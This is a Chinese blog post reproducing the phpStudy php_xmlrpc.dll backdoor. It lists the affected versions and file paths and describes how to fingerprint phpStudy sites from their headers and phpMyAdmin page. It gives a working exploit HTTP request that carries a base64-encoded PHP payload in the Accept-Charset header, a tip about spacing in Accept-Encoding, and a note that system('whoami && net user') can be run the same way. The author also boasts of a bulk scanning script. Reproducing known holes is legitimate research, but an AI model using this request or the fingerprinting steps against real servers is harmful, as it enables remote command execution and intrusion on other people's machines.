phpstudy后门dll文件命令执行漏洞复现

一直安装了phpstudy这个玩意,但没想到这个集成工具还有后门漏洞,于是我一探究竟,环境启动
phpstudy后门dll文件命令执行漏洞复现_第1张图片

判断一个站是不是用phpstudy建成的

当然也不一定是这样的,但phpstudy的站一般都会这样。

1、phpstudy一般会配合phpmyadmin使用
phpstudy后门dll文件命令执行漏洞复现_第2张图片

2、响应包中的Server和X-Powered-By如下所示
phpstudy后门dll文件命令执行漏洞复现_第3张图片

查了下资料,漏洞版本和路径主要如下
漏洞版本

phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

php\php-5.2.17\ext\php_xmlrpc.dll 查找@eval如下图所示证明漏洞存在
phpstudy后门dll文件命令执行漏洞复现_第4张图片

如下图箭头所指的是phpinfo();的base64编码(Accept-Charset:) 这里需要注意的一个坑点在于Accept-Encoding:gzip,deflate中 gzip和deflate前面的空格需要去掉才可以执行命令。
phpstudy后门dll文件命令执行漏洞复现_第5张图片

命令执行echo system(“whoami && net user”); base64编码
phpstudy后门dll文件命令执行漏洞复现_第6张图片

Exp

GET /index.php HTTP/1.1
Host: 192.168.201.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip,deflate
Accept-Charset:cGhwaW5mbygpOw==
Connection: close
Upgrade-Insecure-Requests: 1

写了个批量检测的小脚本,猛的一批!
phpstudy后门dll文件命令执行漏洞复现_第7张图片

你可能感兴趣的:(复现漏洞,安全)